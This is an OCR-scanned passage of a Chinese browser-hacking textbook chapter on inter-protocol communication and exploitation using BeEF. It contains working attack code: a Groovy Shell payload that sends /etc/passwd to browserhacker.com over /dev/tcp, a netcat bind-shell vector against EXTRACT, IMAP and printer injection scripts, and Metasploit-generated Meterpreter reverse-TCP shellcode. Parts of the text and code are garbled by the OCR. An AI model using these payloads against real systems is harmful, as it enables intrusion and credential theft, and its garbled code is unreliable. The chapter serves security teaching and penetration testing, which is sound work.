
body2 = "__END_OF_POSIX_IPC__</div><s"+"cript>window. location=' 
parent + "#ipe_result='vencodeURI(” + 

"document. getElement ById( \\\"ipc_content\\\") inner BTML) ;</* 

+" script></body></html>"; 


IFrame 


+ 


// post results separator 
var response = document .createElement (“input”); 














图 10-15 ”通过 绑 定 shell 实 现 双 向 通信 
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这 个 例子 在 Firefox 中 执行 之 后 ， 不 会 在 JavaScript 控 制 台 看 到 错误 。 但 是 在 Chrome 、Safari 等 
基于 WebKit 的 浏览 器 中 ， 则 会 看 到 违反 SOP 的 报错 信息 ， 因 为 不 能 在 两 个 不 同 源 的 框架 间 通 信 。 
这 也 说 明 不 同 浏览 器 对 SOP 的 实现 并 不 一 致 。 

对 Firefox 之 外 的 浏览 器 ， 必 须 稍 作 修 改 ， 有 以 下 两 个 方案 。 

口 通过 XHR 发 出 跨 域 POST 请 求 ， 通 过 echo 命 令 插 人 包括 Access-Control-Allow-Origin: * 在 

内 的 额外 首部 。 然 后 就 可 以 直接 通过 XHR 请 求 读 取 响 应 了 。 本 章 稍 后 介绍 的 BeEF Bind 就 
采用 了 这 个 方案 。 

口 参考 第 9 章 介 绍 的 XssRays 所 采用 的 手段 。 

本 小 节 的 示例 都 是 基于 绑 定 到 /biny/sh 命 令 的 简单 Netcat 监 听 器 的 。 不 过 现实 当中 碰 到 这 种 
情况 的 机 会 并 不 多 。 在 理解 了 IPC 的 理论 之 后 ， 接 下 来 我 们 看 点 实际 的 应 用 。 

(2) IRC 协 议 间 通信 的 例子 

IRC 是 容错 性 很 高 的 协议 ， 它 不 会 因为 你 发 送 了 语法 错误 的 数据 就 重 置 连接 。 这 一 点 对 我 们 
很 有 利 ， 因 为 HTTP 首 部 并 不 符合 该 协议 的 规范 。 它 会 怎么 办 呢 ? 它 会 报 个 错 ， 然 后 让 你 再 发 一 
次 命令 。 

重用 BeEF 中 的 JavaScript API createIframeIpecForm， 可 以 通过 如 下 代码 加 入 频道 ， 并 向 
IRC 服 务 器 发 送 消息 : 




















=> 










































































F 











var rhost 'irc_server'; 


var rport = '6667'; 

var nick = 'userl234'; 
var channel = '‘#channel_1'; 
var message = 'BeEFed'; 


var irc_commands "NICK " + nick + "Mn"; 


irc_commands += "USER " + nick +" 8 * : " + nick + " user\n"; 
irc_commands += "JOIN " + channel + "\n"; 
irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n"; 


// 发 送 命令 
Var irc_iframe = 
beef.dom.createlframeIpecForm(rhost, rport, 


"/index.html", irc_commands) ; 
// 清除 
cleanup = function() { 


document.body.removeChild(irc iframe); 
} 
setTimeout ("cleanup()", 15000); 


2010 年 的 时 候 ， 不 少 IRC 提 供 商 ， 像 EFnet、OFTC 和 FreeNode ， 都 受到 过 持续 攻击 3。 攻 击 
者 会 埋 下 (类似 前 面 的 ) JavaScript 代 码 ， 而 很 多 用 户 会 在 浏览 相应 页 面 时 无 意 间 触发 代码 。 结 果 
导致 了 多 个 IRC 频 道 被 垃圾 信息 侵扰 。 

(3) 打印 服务 IPC 的 例子 

HP 、Canon 等 多 功能 网 络 打印 机 都 会 运行 很 多 服务 ， 其 中 通常 包括 对 TCP/P 协 议 栈 的 完整 实 
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现 。 因 此 ， 很 容易 在 内 网 上 发 现 这 些 设备 ， 之 后 再 使 用 前 面 介 绍 的 技术 采集 其 指纹 。 


LU 


Deral HeilandZEDEFCON 19”1 上 展示 了 一 项 专门 攻击 网 络 打 印 机 的 研究 成 果 。 以 色 连 浏览 器 





为 前 沿 阵 地 ， 可 以 有 效 地 向 内 网 打印 机 发 送 打 印 作业 。 





Aaron Weaver 在 2007 年 发 表 了 一 篇 题 为 “Cross-site Printing” 的 论文 ， 演 示 了 如 何在 浏览 
中 向 网 络 打 印 机 发 送 打印 作业 ”。Weaver 的 研究 表明 ， 多 数 被 检测 到 的 网 络 打 印 机 都 会 在 TCP 端 
口 9100 上 暴露 Virata-EmWeb 服 务 ， 监 听 需 要 处 理 的 原始 打印 作业 ”。 图 10-16 展 示 了 对 有 漏洞 的 


HP 打印 机 进行 amap 扫 描 后 的 输出 结果 。 


515/tcp open printer 
Virata-EmWeb 6.2.1 (HP printer http config) 





OS details: HP LaserJet 2055dn, 2420, P3005, CP4005, 4250, or P4014 printer 





图 10-16_nmap 打 印 机 扫描 


这 个 接口 非常 基础 ， 只 要 求 你 打开 一 个 指向 打印 机 端口 的 TCP 连 接 ， 然 后 写 人 文本 即 可 。 通 


过 Netcat 可 以 非常 简单 地 做 到 : 


$ nc 10.90.1.131 9100 
Hi from BeEF! 
AC 




















这 个 协议 也 是 实施 IPC 的 不 错 目 标 ， 因 为 并 没有 什么 阻止 你 使 用 HTTP 的 POST 请 求 ， 向 打印 








机 端口 发 送 类 似 的 数据 。 此 外 ,所 有 浏览 器 都 允许 连接 未 被 封禁 的 9100 端 口 。 以 下 代码 可 以 用 于 


向 打印 机 发 送 “Hi from BeEF!” 消 息 : 


var body = "Hi from BeEF!\n"; 
ver TE SLO QOL 

var port = 9100; 

var xhr = new XMLHttpRequest (); 


xhr.open("POST", "http://" + ip + ":" + port + "/",false); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 


xhr.send(body); 


无 需 认 证 ， 可 以 使 用 IPPC。 注意 ， 这 时 候 整 个 HTTP 请 求 都 被 打印 出 来 了 ， 如 图 10-17 所 示 。 


10.5 攻击 非 HTTP 服务 443 








图 10-17 对 HP 打印 机 使 用 IPC 


在 此 基础 上 ， 可 以 进一步 向 打印 机 发 送 PostScript 命 令 ， 该 命令 将 由 PostScript 处 理 器 解释 。 
使 用 PostScript 可 以 为 页 面 添 加 格式 , 有 可 能 打印 出 更 漂亮 的 版 面 布局 。 以 下 代码 演示 了 如 何 使 用 
PostScript， 而 且 这 上段 代码 可 以 通过 修改 pody 变 量 ， 与 使 用 之 前 的 JavaScript 代 码 一 起 使 用 : 


var body = String.fromCharCode(27) + 
"$-12345XGPJL ENTER LANGUAGE = POSTSCRIPT\r\n" 
"S!IPS\r\n" 
"/Courier findfont\r\n" 
"20 scalefont\r\n" 
"setfont\r\n" 
"72 500 moveto\r\n" 

"(Demonstrating IPC) show\r\n" 
"showpage\r\n" 
String.fromCharCode(27) + "%-12345X"; 














+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 


结果 如 图 10-18 所 示 ， 打印 出 来 的 内 容 “Demonstrating IPC” 字 体 为 Courier, 位 置 为 距 左 边 72 
单位 ， 距 顶 边 500 单 位 。 这 里 单位 是 PostScript 中 默认 的 1/72 英 寸 。 CON 
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图 10-18 通过 IPC 打 印 PostScript 格 式 化 页 面 














(4) IMAP 协 议 间 通信 的 例子 

IMAP 协 议 ， 特 别 是 第 3 版 和 第 4 版 ， 非 常 适合 IPPC。 虽然 协议 本 身 非 常 符合 条 件 ， 但 在 实际 
攻击 中 ， 由 于 现代 浏览 器 会 限制 直接 访问 TCP 端 口 143〈 属于 端口 封禁 的 实现 )， 所 以 效果 也 会 
打 个 折扣 。 

有 时 候 也 不 全 是 这 种 情况 ， 比 如 IMAP 3 就 运行 在 TCP 220 端 口 。 此 外 ， 有 些 网 络 管理 员 为 了 
不 让 人 发 现 ， 也 会 把 服务 配置 到 一 个 非 标准 端口 上 。 这 样 就 可 能 给 攻击 者 提供 不 受 封禁 的 端口 。 

但 无 论 如 何 ,IMAP 都 是 用 来 演示 通过 浏览 器 实现 PC 的 绝 佳 范例 。 由 于 其 教育 启示 价值 很 大 ， 
所 以 本 章 很 多 示例 都 会 用 它 。 

为 了 演示 方便 , 在 Firefox 中 可 以 通过 添加 以 下 代码 到 扩展 文件 prefjs， 以 重 写 端口 封禁 规则 : 

pref ("network.security.ports.banned.override", "143"); 

别 忘 了 完事 以 后 删除 它 。 稍 后 我 们 会 介绍 ， 封 禁 这 个 端口 绝对 是 有 必要 的 。 

IMAP 实 现 允 许 来 自 浏览 器 的 IPC， 因 为 相关 服务 通常 满足 实施 IPC 的 两 个 条 件 。 下 面 的 示例 
代码 演示 了 登录 和 退出 IMAP 服 务 器 的 过 程 : 

var server = '172.16.37.151'; 


Var pört 2. "14325 
var commands = 'a01 login root password\na002 logout'; 
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var target "http://" + server + ":" + port + "/abc.html"; 
var iframe = beef.dom.createInvisiblelframe(); 


var form = document.createElement ('form'); 
form.setAttribute('name', 'data'); 
form.setAttribute('action', target); 
form.setAttribute('method', 'post'); 
form.setAttribute('enctype', 'text/plain'); 


var input - document.createElement('input'); 
input.setAttribute('id', 'datal') 
input.setAttribute('name', 'datal') 
input.setAttribute('type', 'hidden'); 
input.setAttribute('value', commands); 
form.appendChild(input); 


iframe.contentWindow. document .body.appendChild(form) ; 
form.submit (); 


这 个 例子 中 的 IMAP 服 务 器 是 Eudora, 稍 后 我 们 会 再 用 它 来 演示 协议 间 利 用 。 如 图 10-19 所 示 ， 
IMAP 服 务 器 在 接收 到 POST 请 求 后 ， 会 将 HTTP 首 部 解析 为 不 正确 的 命令 ( "unrecognized or not 
valid in the current state”)。 而 包含 在 POST 请 求 体 中 的 IMAP 命 令 则 会 被 正确 解析 。 在 这 个 例子 中 ， 
登录 失败 ， 因 为 我 们 没有 登录 凭证 。 


>>> POST /abc.html HITP/1.1 

ost: 172.16.37.151:143 

MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 
Accept: text/html,application/xhtml+xml, application/xml;q=ad.9,*/*:qa0.8 

Accept-Language: en-US,en:qe0.5 

Accept-Encoding: gzip, deflate 

MDNT: 1 

MiConnection: keep-alive 3 pi á 

MiContent-Iype: text/plain HTTP 首部 被 解析 为 错误 命令 


MiCcontent-Length: 44 








101 login root p 
a002 logout 
<<< POST BAD comezzd "/abc.html" unrecognized or not valid in the current state 


<<< Host: BAD command "172.16.37.151:143" unrecognized or not valid in the current state 


M ««« Accept: BAD command "text/html,application/xhtmlexml,application/xml;qe0.9,*/^;qw0,.8" unrecognize 


Accept-Encoding: BAD command "gzip," unrecognized or not valid in the current state 
DNT: BAD command "1" unrecognized or not valid in the current state 


Content-Type: BAD command "text/plain" unrecognized or not valid in the current state 


(>>> datal=a01 LOGIN root ***** < A~ 
<<< datal=a01 NO LOGIN root username/password incorrect POST 主体 包 合 
有 效 命令 








< * BYE IMAP4 Server logging out 
a002 OK LOGOUT completed 








图 10-19 ”了 PC 导致 的 IMAP 服 务 日 志 


通过 图 10-19 可 以 看 出 ，IMAP 服 务 器 的 响应 为 “incorrect password” ( 密码 错误 )。 如 果 登 录 
成 功 ， 返 回 的 结果 就 不 一 样 了 ， 应 该 知道 如 何 区 分 。 

有 些 IMAP 服 务 器 支持 发 送 电子 邮件 ， 可 以 利用 这 个 功能 创建 一 个 边 带 信道 〈side channel )。 
根据 实现 不 同 ， 可 以 使 用 时 差 ， 请 参见 10.4 节 中 的 相关 内 容 。 登 录 后 ， 列 出 收 件 箱 中 的 内 容 很 可 
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能 比 在 未 认证 的 连接 上 遇 到 错误 花费 的 时 间 多 一 些 。 

前 面 我 们 介绍 的 几 种 协议 并 不 是 可 以 实现 IPC 的 全 部 协议 。 只 要 满足 IPC 条 件 ( 容错 和 数据 封 
装 ) 的 协议 ， 都 可 能 通过 IPC 通 信 。 本 小 节 讨 论 的 一 些 细节 值得 牢记 ,或 许 它们 在 你 将 来 遇 到 新 
的 IPC 目 标 ， 并 准备 实现 渗透 测试 时 能 够 派 上 用 场 。 

















10.5.3 ”实现 协议 间 利 用 


上 一 小 节 讨 论 了 协议 间 通 信 , 而 Wade Alcorn 的 研究 不 止 如 此 。2007 年 ，Alcorn 在 一 篇 研究 论 
文中 表明 ”, IPC 技 术 不 仅 可 以 实现 通信 , 还 可 以 实现 利用 , 也 就 是 IPE( Inter-protocol Exploitation , 
协议 间 利 用 )。 这 里 所 说 的 利用 涉及 对 底层 应 用 的 利用 。 如 果 你 理解 起 来 觉得 有 点 困难 ， 可 以 参 

区 《黑客 攻防 技术 宝典 : 系统 实战 篇 (第 ?版 )》 这 本 书 ”。 

如 果 你 能 像 上 一 节 演 示 的 那样 , 使 用 HTTP 与 非 HTTP 协 议 通信 , 那么 也 应 该 可 以 在 发 送 的 数 
据 中 包含 Shellcode。 与 IPC 类 似 ，IPE 也 依赖 容错 和 数据 封装 。 

下 面 我 们 在 之 前 讨论 的 那个 最 简单 的 IPC 示 例 基础 上 稍 加 扩展 。 比 如 ， 假设 有 一 个 服务 会 查 
找 如 下 命令 : 

WRITE <content> <file path> 

假设 处 理 <file_path> 的 代码 存在 缓冲 区 溢出 漏洞 ， 可 能 是 因为 使 用 memcpy 复 制 内 容 , 但 
并 没有 检查 来 源 长 度 ， 而 直接 把 内 容 放 到 了 1024 字 节 的 缓冲 区 内 。 如 果 你 想 发 现 这 个 应 用 漏洞 ， 
就 要 制造 输入 数据 ， 使 其 达到 崩 淡 的 条 件 。 当 然 ， 这 个 虚构 的 例子 会 月 演 。 

在 通过 file_path 提 交 了 1500 字 节 的 数据 后 , WRITE 命 令 返 回 了 分 段 错误 数据 。 通过 对 错误 
的 分 析 ， 你 发 现 可 以 控制 EIP (Extended Instruction Pointer， 扩 展 指 令 寄存 器 )， 并 且 内 存 中 有 800 
字 节 空间 可 以 保存 你 的 Shellcode。 想必 有 读者 已 经 猜 到 了 , 这 个 虚构 的 例子 实际 上 已 经 满足 了 IPE 
的 条 件 。 

1. 计算 HTTP 首 部 大 小 

在 发 送 包 含 Shellcode 的 POST 请 求 时 ， 通 常 必 须 非 常 精确 才 行 。 需 要 指定 返回 地 址 是 什么 ， 
总 共 要 使 用 多 少 NOP( 以 及 其 他 垃圾 ), 否则 , 1 字 节 的 错误 就 可 能 导致 作为 目标 的 监听 服务 崩 演 。 
然后 Shellcode 将 无 从 执行 ， 攻 击 计划 落空 。 

前 面 我 们 讲 到 过 ,HTTP 首 部 会 被 目标 协议 丢弃 。 可 是 ， 丢弃 只 是 结果 ， 并 不 表示 目标 协议 
不 会 解析 它们 ， 不 会 将 它们 加 载 到 内 存 里 。 有 了 时候， 这 意味 着 必须 对 包含 多 大 的 首部 精打细算 
eps 

验证 HTTP 首 部 会 被 保存 在 内 存 中 的 最 简单 方式 ， 就 是 给 你 要 分 析 的 进程 附加 一 个 调试 器 。 
在 下 一 小 节 以 IMAP 为 例 介绍 如 何 实现 IPE 时 ， 你 会 知道 Eudora WorldMail 6.1.21 ( 及 更 早 版 本 ) 
在 解析 POST 请 求 体 前 ， 会 把 HTTP 首 部 保存 到 内 存 中 。 

此 外 , 在 发 送 跨 域 POST 请 求 时 ,我 们 无 法 事先 知道 HTTP 首 部 的 确切 大 小 。 每 个 浏览 器 都 不 
一 样 ， 而 且 经 常会 包含 不 同 的 首部 。 而 我 们 必须 确保 利用 的 可 靠 性 ， 和 否则 Shellcode 不 会 执行 ， 而 
且 目 标 服务 会 月 省。 
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那 怎 么 解决 这 个 问题 呢 ? 一 种 方法 是 提前 确定 勾 连 浏览 器 所 提交 首部 的 确切 大 小 。 为 此 , 可 
以 把 你 想 发 送 的 同样 的 跨 域 请 求 ， 先 发 到 由 你 控制 的 一 个 HTTP 服 务 上 。BeEF 为 此 会 在 一 个 特别 
的 端口 上 绑 定 一 个 服务 器 套 接 字 ， 以 模拟 蜂 域 时 的 状态 。 只 要 拿 到 到 达 该 套 接 字 的 原始 HTTP 请 
求 ， 就 可 以 计算 出 首部 的 确切 大 小 。 勾 连 浏览 絮 之 后 会 接收 到 一 个 JSON 对 象 ， 包含 跨 域 请 求 长 
度 计 算 的 结果 。 以 下 代码 负责 计算 首部 的 大 小 ， 之 后 把 结果 返回 给 匀 连 浏览 器 


# 确定 跨 源 HTTP 首 部 的 确切 大 小 
# 需要 正确 计算 junk， 避免 出 错 
+ 完成 的 URL 是 <BeEF_server>/api/ipec/junk/<socket_name> 
get '/junk/:name' do 
socket_name = params[:name] 
halt 401 if not BeEF::Filters.alphanums_only? (socket_name) 
Socket data = BeEF::Core::NetworkStack::Handlers::AssetHandler. \ 
instance.get socket data(socket name) 
halt 404 if socket data -- nil 

















if socket_data.include?("\r\n\r\n") 
result - Hash.new 


headers = socket_data.split("\r\n\r\n").first 
BeEF::Core::NetworkStack::Handlers::AssetHandler. \ 
instance.unbind socket (socket name) 
print info "[IPEC] Cross-origin XmlHttpRequest headers \ 
Size - received from bind socket [#{socket_name}]: ^ 
#{headers.size + 4} bytes." 
# CRLF -> 4 B 
result['size'] = headers.size + 4 


headers.split("\r\n").each do |line| 
if line.include? ("Host") 


result['host'] = line.size + 2 
end 
if line.include? ("Content-Type") 
result['contenttype'] = line.size + 2 
end 
if line.include? ("Referer") 
result['referer'] = line.size + 2 
end 
end 
result.to json 
else 


print error "[IPEC] Looks like there is no CRLF \ 
in the data received!" 
halt 404 
end 
end 


拿 到 这 些 信 息 之 后 ， 就 可 以 放心 地 动态 计算 NOP 的 数量 (或 其 他 额外 垃圾 的 大 小 )， 再 通过 
勾 连 浏览 器 把 利用 payload 发 送 到 目标 服务 。 然 后 ， 通 过 调整 Host、Content-type、Referer 等 首部 ， 
很 容易 装 成 跨 域 HTTP 请 求 。 而 且 请 求 还 包含 精确 调整 过 的 NOP 和 Shellcode 大 小 ， 保 证 不 会 触发 
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执行 错误 。 

前 面 讨 论 了 目标 服务 是 否 会 把 HTTP 首 部 保存 在 与 Shellcode 落 地 后 相同 的 缓冲 区 内 。 这 对 接 
下 来 要 讨论 的 认证 后 利用 非常 重要 。 首 先 要 有 合法 的 凭据 来 访问 服务 , 之 后 就 是 Shellcode 利 用 栈 
溢出 漏洞 。 比 如 , 假如 你 想 利 用 FTP 服 务 絮 MKD 命令 实现 中 的 漏洞 , 那 必须 首先 通过 FTP 服 务 器 的 
认证 。 

Ty Miller 和 Michele OrrüfERuxCon 2012 上 发 表 了 对 BeEF 的 Bind IPERI o Rodrigo Marcos 
和 SecForce 团 队 护 展 了 他 们 的 研究 ， 在 不 需要 事先 计算 HTTP 首 部 长 度 的 前 提 下 ， 成 功利 用 了 认 
证 后 漏洞 ”*. 

var auth = 'USER anonymous\r\nPASS anonymous\r\n'; 


var payload = 'MKD \x89[..shellcode...] '; 
var body = auth + payload; 


他 们 把 对 EasyFTP Server 的 一 个 利用 , 移植 到 在 HTTP 的 POST 请 求 体内 提交 的 IPE。 请 求 体 是 
通过 之 前 的 代码 生成 的 。 

Marcos 和 SecForce 团 队 发 现 ， 在 实施 IPE 的 时 候 ， 并 不 需要 确切 的 HITP 首 部 大 小 。 然 而 ， 事 
实 却 并 非 一 直 如 此 。 关 键 是 要 知道 , 具体 情况 还 得 具体 分 析 , 有 时 候 的 确 需 要 在 提交 利用 payload 
前 ， 先 计算 一 下 HTTP 首 部 的 大 小 。 考 虑 到 这 一 点 ， 加 上 容错 和 数据 封装 ， 从 IPC 到 IPE 需 要 满足 
的 条 件 ， 应 该 还 有 所 提交 首部 的 大 小 。 

2. 协议 间 利 用 的 例子 

知道 了 IPE 的 必要 条 件 ， 下 面 我 们 就 深入 实践 吧 。 接 下 来 几 小 节 会 介绍 几 种 可 以 通过 在 浏览 
器 中 发 请 求 利用 的 协议 。 

(1) Groovy Shell 协 议 间 利用 的 例子 

Groovy Shell Server "是 演示 IPE 攻 击 的 一 个 好 例子 。Groovy Shell Server 是 流行 的 Groovy Shell 
的 “守护 版 "， 作 为 一 个 命令 行 应 用 ， 通 过 它 可 以 动态 执行 Groovy 代 码 。 在 敏捷 开发 的 项 目 里 ， 
使 用 Groovy 和 Grails 来 加 速 通 常 的 Java 开 发 是 非常 常见 的 。 2013 年 5 月 , Brendan Coles 发 现 , Groovy 
Shell Server 不 仅 有 远程 代码 执行 (RCE ) 漏洞 ， 而 且 也 具备 IPE 的 条 件 。 这 个 程序 使 用 的 自 定义 
协议 默认 启用 6789 端 口 ， 这 也 是 一 个 有 利 条 件 ， 因 为 浏览 器 默认 不 会 屏蔽 这 个 端口 。 

在 这 个 例子 中 ， RCE 利用 要 比 更 复杂 的 溢出 简单 ， 因 为 不 需要 关注 内 存 分 配 或 Shellcode。 
于 Groovy Shell ( 像 常 规 命令 行 工 具 一 样 ) 接收 发 送 给 6789 端 口 的 任何 内 容 ， 因 此 可 以 实施 IPE。 
其 实 就 是 一 个 把 Groovy 代 码 封装 到 HTTP 的 POST 请 求 中 的 问题 ， 如 下 所 示 : 


'192.168.0.100'; // Targeted host 
'6789'; // Targeted port 















































































































































var rhost - 
var rport - 
// 多 数 Linux 发 布 版 (Depian、Ubuntu， 等 等 ) 都 支持 /dev/tcp 

var cmd = 'cat /etc/passwd >/dev/tcp/browserhacker.com/8888'; 
// 使 用 Groovy 的 "command" . execute () 方 法 创建 最 终 内 容 

var payload = "WXrWMndiscardNrNnprintln '" + cmd + 

"' Texecute().text\r\ngo\r\nexit\r\n"; 


// 发 送 POST 请 求 
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beef.dom.createIframeIpecForm(rhost, rport, "/", payload); 


通过 其 中 的 payload 变 量 值 可 以 看 出 , 命令 cmg 会 像 Java 执 行 系统 命令 一 样 被 执行 。 在 Java 中 ， 


我 们 需要 执行 : 


String cmd = "uname -ra"; 
Runtime.getRuntime() .exec (cmd); 


虽然 Groovy 语 言 的 语法 稍微 能 简化 一 点 ， 但 执行 相同 的 任务 的 代码 还 是 挺 像 的 : 


def cmd = "uname -ra" 
cmd.execute() 


如 果 被 利用 的 服务 器 运行 在 Linux 操 作 系 统 上 ， 而 且 该 系统 配置 了 /devwtcp 设 备 ， 那 就 可 以 把 


/etc/passwd 的 内 容 抽取 到 browserhackercom:8888。 没 什么 可 以 阻止 你 创建 多 个 内 艇 框 架 ， 每 个 都 
使 用 不 同 的 RCE 向 量 ( 比如 Netcat 绑 定 或 反弹 连接 )， 而 且 攻 击 不 同 的 目标 平台 。 








(2) EXTRACT 协 议 间 利 用 的 例子 
EXTRACT 是 一 个 Web 信 息 管 理 系统 ， 可 以 让 用 户 在 按 类 别 分 类 的 数据 库 中 ， 搜 索 不 同 的 数 














据 结 构 。 有 人 发 现 ”，EXTRACT 存 在 RCE 漏 洞 ， 发 现 者 同样 是 Brendan Coles 。 默 认 情 况 下 , 
EXTRACT 使 用 的 自 定义 协议 , 可 以 通过 TCP 端 口 10100 访 问 , 而 端口 封禁 机 制 不 会 阻止 对 这 个 端 
口 HTTP 连 接 。 





与 前 面 的 Groovy Shell 利 用 不 同 ，EXTRACT 稍 微 狐 独 一 点 。 在 协议 内 部 ，createuser 命 令 























是 有 漏洞 可 以 被 RCE 的 。 但 是 , 命令 的 输入 不 能 包含 任何 空格 ,这 是 当然 的 ， 因 为 用 户 名 里 不 应 





该 包含 空白 符 。 有 经 验 的 渗透 测试 人 员 可 能 熟悉 下 面 这 个 不 包含 任何 空格 的 攻击 向 量 : 


(netcat,-1,-p,1337,-e,/bin/bash) 
这 个 向 量 使 用 了 Linux 系 统 Bash 终 端 里 的 Bracket Expansion 功 能 ”。 前 面 那 行 代码 会 被 Bash 扩 






































展 ， 删 除 大 括号 ( 人 )， 将 其 中 的 每 个 逗号 替换 成 空格 ， 然 后 最 终 执行 命令 。 

最 终 针 对 EXTRACT 0.5.1 服 务 的 攻击 向 量 如 下 : 

var cmd = "{netcat,-1,-p,1337,-e,/bin/bash}"; 

var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n'; 

beef.dom.createlframeIpecForm(host, port, "/index.html", payload); 

如 果 命 令 如 期 执行 ,那么 应 该 可 以 通过 Netcat 连 接 到 目标 主机 的 1337 端 口 ， 并 取得 终端 控制 
权 。 如 果 被 利用 的 系统 在 防火 墙 后 面 ， 那 么 可 以 使 用 本 章 前 面 介绍 的 绑 定 shell IPC 方 法 。 

(3) IMAP 协 议 间 利用 的 例子 

Tim Shelton 发 现 ，Eudora WorldMail IMAP 服 务 器 的 6.1.21 及 更 早 版 本 ， 存 在 认证 前 的 溢出 漏 
洞 。 要 利用 该 漏洞 ， 需 要 提交 恰当 的 LTST 命 令 “。 在 该 服务 接收 到 HTTP 数 据 后 ， 对 照 IMAP 数 据 

















进行 内 存 分 析 ， 可 以 看 到 HTTP 首 部 保存 在 内 存 里 的 什么 位 置 。 图 10-20 展 示 了 把 Immunity 
Debugger 附 加 到 相应 进程 后 的 结果 。 
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ASCIT Comment 

D19AFCT4 0041DF68 n8A. | IMAP4A. O04 1DF68 

OLSAFC?78 019AFC98| “aio [ASCII "POST / HITP/1.LODHost: 172.16.67.135:14 
OlSAFC?C| OD40CSSO Oia. | IMAP4A.O0040C99 

OLSAFC8O| OlSAFCSS|"u$D |ASCII "POST / NTTP/l.lUDHost: 172.16.67.135:14 
D1ED1FAS | WOm0 |MSSPIAUT.«Modu]eEntryPoint» 

O1SAFC88| 00000000|.... 
OLSAFCEC rt a 
OLSAFCSO) 00000000|.... 





OlSAFCS4| 00000334|40.. 
OlSAFCSB| 54534750| post 
O19AFCSC 46202p20| /H 
OLSAFCAO| ZF505454|TTP/ 
OlSAFCAd| 0D312331| 1.1 


O1SAFCAS| 736F480A|| .Hos 
OlSAFCAC| 31203A74|t: 1 
OlSAFCBO| 31229297) 72.1 
OlSAFCB4| 97962836] 6.67 
OlSAFCB8| 35399122] .135 
OlSAFCBC| 33343134|:143 
OlSAFCCO| 73550A0D|..Us 
OlSAFCC4| 412D7265|er-A 
OlSAFCCB| 7466567 gant 
DlSAFCCC| 6F4D203A|: Mo 
OlSAFCDO| 6C6C697A|zi11 
OlSAFCD4| 2ES52761|a/5 

OlSAFCDB| 4p282030|0 (M 
OlSAFCDC| 6696361) acin 


[exesmena! canacnns|. .a 
im 


















































图 10-20 ”位 于 进程 内 存 中 的 HTTP 首 部 


要 成 功利 用 该 服务 ， 需 要 知道 浏览 器 发 送 的 HITP 首 部 组 合 起 来 的 数据 长 度 。 
因为 知道 这 个 信息 才能 控制 数据 保存 到 内 存 中 的 位 置 。 





这 个 很 重要 ， 


使 用 BeEF 计 算 这 个 长 度 分 两 步 ， 使 用 的 也 是 前 面 讨论 的 计算 HTTP 首 部 长 度 的 逻辑 。 假 设 
BeEF 运 行 在 browserhacker.com:3000 上， 而 HTTP 计 算 服 务 器 套 接 字 在 端口 2000 上 。 可 以 使 用 下 面 


的 JavaScript 代 码 ， 计 算 后 面 的 利用 请 求 中 要 用 到 的 HTTP 首 部 大 小 : 


var beef_host = "http://browserhacker.com"; 
var beef_junk_port = 2000; 
var uri = "http://" + beef_host + ":" + beef_junk_port + "/"; 


var xhr = new XMLHttpRequest (); 

xhr.open("POST", uri, true); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 
xhr.send(" 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); 


套 接 字 接 收 到 请 求 后 ，BeEF 控 制 台 就 会 给 出 如 下 消息 : 


[18:56:06][*] [IPEC] Cross-origin XmlHttpRequest headers 
Size - received from bind socket [imapeudoral]: 443 bytes. 





" 4 




















这 样 BeEF 服 务 器 知道 了 跨 域 HTTP 请 求 首 部 的 确切 大 小 。 第 二 步 就 是 把 这 个 正确 的 大 小 告诉 
勾 连 浏览 器 。 这 样 才能 让 色 连 浏览 器 构建 出 一 个 IPE， 把 数据 (NOP 和 Shellcode ) 放 到 内 存 中 正 








确 的 位 置 上 。 





在 这 个 例子 中 ,我们 要 使 用 Metasploit Meterpreter] reverse, tcp payload, ， 而 不 再 自己 手工 
编造 恶意 payload。 假 设 反弹 连接 处 理 程序 监听 的 是 172.16.37.1:9999。 以 下 Metasploit 命 令 就 可 以 


为 你 生成 Shellcode payload : 
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msf payload(reverse_tcp) > use payload/windows/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > set LHOST 172.16.37.1 

LHOST => 172.16.37.1 
msf payload(reverse tcp) » set LPORT 9999 
LPORT => 9999 
msf payload(reverse tcp) > generate -b "\x00\x0a\x0d\x20\x7b" 
# windows/meterpreter/reverse tcp - 317 bytes (stage 1) 

# http://www.metasploit.com 

# Encoder: x86/shikata, ga nai 

# VERBOSE-false, LHOST-172.16.37.1, LPORT-9999, 

buf = 
"\xda\xdf\xd9\x74\x24\xf4\xbe\xba\xeb\xc6\xfc\x5a\x29\xc9" 
"\xb1\x49\x83\xea\xfc\x31\x72\x15\x03\x72\x15\x58\xle\x3a" 
"\x14\x15\xel\xc3\xe5\x45\x6b\x26\xd4\x57\x0£\x22\x45\x67" 
"\x5b\x66\x66\x0C\x09\x93\xfd\x60\x86\x94\xb6\xce\xf£0\x9b" 
"\x47\xf£\x3c\x77\x8b\x9e\xc0\x8a\xd8\x40\xf8\x44\x2d\x81" 
"\x3d\xb8\xde\xd3\x96\xb6\x4d\xc3\x93\x8b\x4d\xe2\x73\x80" 
"\xee\x9c\xf6\x57\x9a\x16\xf8\x87\x33\x2d\xb2\x3£\x3£\x69" 
"\x63\x41\xec\x6a\x5£\x08\x99\x58\x2b\x8b\x4b\x91\xd4\xbd" 
"\xb3\x7d\xeb\x71\x3e\x7c\x2b\xb5\xal\x0b\x47\xc5\x5c\x0b" 
"\x9c\xb7\xba\x9e\x01\x1f£\x48\x38\xe2\xal\x9d\xde\x61\xad" 
"\x6a\x95\x2e\xb2\x6d\x7a\x45\xce\xe6\x7d\x8a\x46\xbc\x59" 
"\x0e\x02\x66\xc0\x17\xee\xc9\xfd\x48\x56\xb5\x5b\x02\x75" 
"\xa2\xdd\x49\x12\x07\xd3\x71\xe2\x0£\x64\x01\xd0\x90\xde" 
"\x8d\x58\x58\xf8\x4a\x9e\x73\xbc\xc5\x61\x7c\xbe\xcc\xa5" 
"\x28\xec\x66\x0f£\x51\x67\x77\xb0\x84\x27\x27\xle\x77\x87" 
